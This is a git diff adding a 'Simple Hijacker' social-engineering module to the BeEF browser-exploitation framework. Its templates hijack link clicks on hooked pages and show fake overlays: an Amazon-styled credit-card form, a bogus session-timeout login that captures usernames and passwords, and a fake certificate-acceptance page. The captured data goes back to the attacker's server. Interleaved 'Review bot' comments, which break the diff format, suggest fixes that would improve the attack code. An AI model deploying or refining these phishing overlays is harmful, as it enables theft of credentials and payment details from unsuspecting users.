diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
new file mode 100644
index 000000000..e924ebb41
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+hijack = function(){
+ function send(answer){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
+ }
+ <% target = @targets.split(',') %>
+ $j('a').click(function(e) {
+ e.preventDefault();
+ if ($j(this).attr('href') != '')
+ {
+ if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
+ <%
+ tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
+ file = File.open(tplpath, "r")
+ @template = file.read
+ %>
+
+ <%= @template %>
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
+ }
+ }
+ });
+}
+
+beef.execute(function() {
+ hijack();
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
+});
diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
new file mode 100644
index 000000000..8fbb9209d
--- /dev/null
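Review bot: The embedded Ruby block in the click handler builds `tplpath` from `@choosetmpl` and opens it with `File.open(tplpath, "r")` without checking the value against the configured template list and without closing the handle. module.rb only offers the configured names in a combobox, and nothing visible here enforces that on the server, so a value containing path separators could presumably make the framework read a `.js` file outside the templates directory. I would reject any `@choosetmpl` that is not in `beef.module.simple_hijacker.templates` before building the path, and read with `@template = File.read(tplpath)`, which also releases the descriptor. The same hunk interpolates each `<%=href%>` into a double-quoted JavaScript string unescaped, so a target containing `"` produces a script that does not parse.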
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ simple_hijacker:
+ enable: true
+ category: "Social Engineering"
+ name: "Simple Hijacker"
+ description: "Hijack clicks on links to display what you want."
+ templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+ authors: ["gallypette"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
new file mode 100644
index 000000000..6a40a85ed
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -0,0 +1,48 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Simple_hijacker < BeEF::Core::Command
+
+ def self.options
+
+ config = BeEF::Core::Configuration.instance
+ @templates = config.get('beef.module.simple_hijacker.templates')
+
+ # Defines which domains to target
+ data = []
+ data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
+
+ # We'll then list all templates available
+ tmptpl = []
+ @templates.each{ |template|
+ tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
+ raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
+ tmptpl<<[ template]
+ }
+
+ data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
+
+ return data
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ save({'answer' => @datastore['answer']})
+ end
+
+end
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js
new file mode 100644
index 000000000..0c58ba121
--- /dev/null
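Review bot: `File.exists?` in the template loop of `self.options` is the deprecated alias and was removed in Ruby 3.2; the check should read `raise "Invalid template path for command template #{template}" unless File.exist?(tplpath)`. Because the check raises from `self.options`, a single missing file listed in config.yaml makes the whole option list fail instead of skipping that template, which may or may not be intended. `@templates` is stored as a class-level instance variable where a local would do. The UI strings `separed` and `Targetted` are misspelled (`separated`, `Targeted`).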
+++ b/modules/social_engineering/simple_hijacker/templates/amazon.js
@@ -0,0 +1,28 @@
+ beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+ $j(document).attr('title', $j(this).html());
+ document.body.scroll = 'no';
+ document.documentElement.style.overflow = 'hidden';
+
+ collect = function(){
+ answer = "";
+ $j(":input").each(function() {
+ answer += " "+$j(this).attr("name")+":"+$j(this).val();
+ });
+ send(answer);
+ }
+
+ // floating div
+ function writediv() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'hax');
+ sneakydiv.setAttribute('display', 'block');
+ sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '
Your credit card details expired, please enter your new credit card credential to continue shopping-
Changes made to your payment methods will not affect orders you have already placed.
Your Account>

Add a Credit or Debit Card

  Edit your payment method:
Cardholder Name:
Exp. Date: 
Number:

Confirm
';
+ }
+
+ writediv();
+
+ $j("#confirm").click(function () {
+ $j('#hax').remove();
+ });
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
new file mode 100644
index 000000000..d1adce6d5
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
@@ -0,0 +1,50 @@
+ // floating div
+ function writediv() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'background');
+ sneakydiv.setAttribute('oncontextmenu','return false;');
+ sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#500; font-family:Helvetica,Arial,sans-serif; margin:0px;');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '
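Review bot: `collect`, `answer` and `sneakydiv` are assigned without `var`, so each becomes a property of the hooked page's `window` and can overwrite a same-named variable of the application under test; chromecertbeggar.js (`forward`, `getDomain`, `sendCommand`, `toggleMoreInfo`, `target`, `domain`, `timer`) and credential.js (`imgr`, `sneakydiv`, `credgrabber`, `processval`, `uname`, `pass`) do the same. Declaring them with `var` keeps them local to the click handler that command.js inlines the template into, unless the overlay markup, which is not readable here, calls them from inline handlers. In `collect`, `$j(":input")` matches every form field in the document rather than only those inside `#hax`, so unrelated values from the page are swept up; `$j("#hax :input")` limits it to the overlay. `sneakydiv.setAttribute('display', 'block')` sets an attribute that has no meaning on a `div` and can be dropped.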
background
SSL Error Icon
Please accept our new SELF®-Signed Certificate to ensure maximum security protection.
'+domain+' chose SELF® to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.

SELF® - to make the Internet a safer place.
read more about the SELF® certification authority

Security Enhanced Layer Factory®: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF® help people as customer or seller to feel safe by issuing SELF®-signed certificate that are build to last. With SELF® you will never be harmed again - Trust is our workship.

Security Enhanced Layer Factory®, SELF® and SELF® logo are registered trademarks.

';
+ toggleMoreInfo(true);
+ setDirectionSensitiveImages();
+ }
+
+ forward = function(){
+ send("User continuing to "+target);
+ timer=setInterval(function(){window.location = target;},500);
+ }
+
+ getDomain = function(url){
+ return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
+ }
+
+ function $(o) {return document.getElementById(o);}
+
+ sendCommand = function(cmd) {
+ window.domAutomationController.setAutomationId(1);
+ window.domAutomationController.send(cmd);
+ }
+
+ toggleMoreInfo = function(collapse) {
+ if (collapse) {
+ $("more_info_long").style.display = "none";
+ $("more_info_short").style.display = "block";
+ } else {
+ $("more_info_long").style.display = "block";
+ $("more_info_short").style.display = "none";
+ }
+ }
+ setDirectionSensitiveImages = function () {
+ if (document.documentElement.dir == 'rtl') {
+ $("twisty_closed_rtl").style.display = "inline";
+ } else {
+ $("twisty_closed").style.display = "inline";
+ }
+ }
+
+ target = $j(this).attr('href');
+ domain = getDomain(target);
+ $j(document).attr('title', domain+" Security Enhanced Layer Factory® certificate acceptance");
+ writediv();
+
diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
new file mode 100644
index 000000000..d8c79bc7b
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
@@ -0,0 +1,10 @@
+var answer = confirm("Do you really want to leave us ??")
+if (answer){
+ alert("Okay :(")
+ send("User chose to leave.");
+ window.location = $j(this).attr('href');
+}
+else{
+ alert("Okay enjoy ")
+ send("User chose to stay.");
+}
diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
new file mode 100644
index 000000000..d0b1eacb0
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
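Review bot: `getDomain` in chromecertbeggar.js indexes the result of `url.match(...)` directly, so an `href` without `://` (a relative link) makes `match` return `null` and the handler throws after `e.preventDefault()` in command.js has already cancelled navigation, leaving the link dead. Guard the lookup, e.g. `var m = url.match(/:\/\/(www\.)?(.[^/:]+)/); return m ? m[2] : window.location.hostname;`. `forward` starts a `setInterval` that is never cleared and re-assigns `window.location` every 500 ms; `setTimeout` is the one-shot equivalent. The local `function $(o)` shadows any `$` the page defines for the rest of the inlined handler, so a less generic name would be safer.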
@@ -0,0 +1,105 @@
+ imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+ var answer= '';
+
+ beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+ $j(document).attr('title', $j(this).html());
+ document.body.scroll = 'no';
+ document.documentElement.style.overflow = 'hidden';
+
+ // set up darkening
+ function grayOut(vis, options) {
+ // Pass true to gray out screen, false to ungray
+ // options are optional. This is a JSON object with the following (optional) properties
+ // opacity:0-100 // Lower number = less grayout higher = more of a blackout
+ // zindex: # // HTML elements with a higher zindex appear on top of the gray out
+ // bgcolor: (#xxxxxx) // Standard RGB Hex color code
+ // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+ // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+ // in any order. Pass only the properties you need to set.
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ // The dark layer doesn't exist, it's never been created. So we'll
+ // create it here and apply some basic styles.
+ // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div'); // Create the layer.
+ tnode.style.position='absolute'; // Position absolutely
+ tnode.style.top='0px'; // In the top
+ tnode.style.left='0px'; // Left corner of the page
+ tnode.style.overflow='hidden'; // Try to avoid making scroll bars
+ tnode.style.display='none'; // Start out Hidden
+ tnode.id='darkenScreenObject'; // Name it so we can find it later
+ tbody.appendChild(tnode); // Add it to the web page
+ dark=document.getElementById('darkenScreenObject'); // Get the object.
+ }
+ if (vis) {
+ // Calculate the page width and height
+ if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+ var pageWidth = document.body.scrollWidth+'px';
+ var pageHeight = document.body.scrollHeight+'px';
+ } else if( document.body.offsetWidth ) {
+ var pageWidth = document.body.offsetWidth+'px';
+ var pageHeight = document.body.offsetHeight+'px';
+ } else {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ }
+ //set the shader to cover the entire page and make it visible.
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ }
+
+ // function to send response
+ function win(){
+ document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

';
+ answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+ }
+
+ // perform darkening
+ grayOut(true);
+
+ function checker(){
+ processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+ if (processval == "Processing..") {
+ uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+ pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+ answer = uname+":"+pass
+ send(answer);
+ // set lastchild invisible
+ document.body.lastChild.setAttribute('style','display:none');
+ // lighten screen
+ grayOut(false);
+ clearInterval(credgrabber);
+ $j('#hax').remove();
+ $j('#darkenScreenObject').remove();
+ }
+ }
+
+
+ // floating div
+ function writeit() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'hax');
+ sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+ sneakydiv.setAttribute('align', 'center');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

';
+ credgrabber = setInterval(checker,1000);
+
+ }
+
+ writeit();
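Review bot: `win()` assigns to `innerHtml`, which is not a DOM property (the property is `innerHTML`), so the statement only creates an expando on the element; `win` is also never called in the visible lines, so the whole function looks like dead code that can be removed. `imgr` hard-codes `http://0.0.0.0:3000/ui/media/images/beef.png` although command.js already takes server values from ERB, and the address will not match a deployment on another host or port. The "function to send response" comment above `win` does not describe it, since it sends nothing, and the file has no header comment saying which names it expects from the enclosing handler (`send`, `$j`, `this`). The `if (vis)` branch of `grayOut` declares `pageWidth` and `pageHeight` with `var` three times; declare them once before the branch.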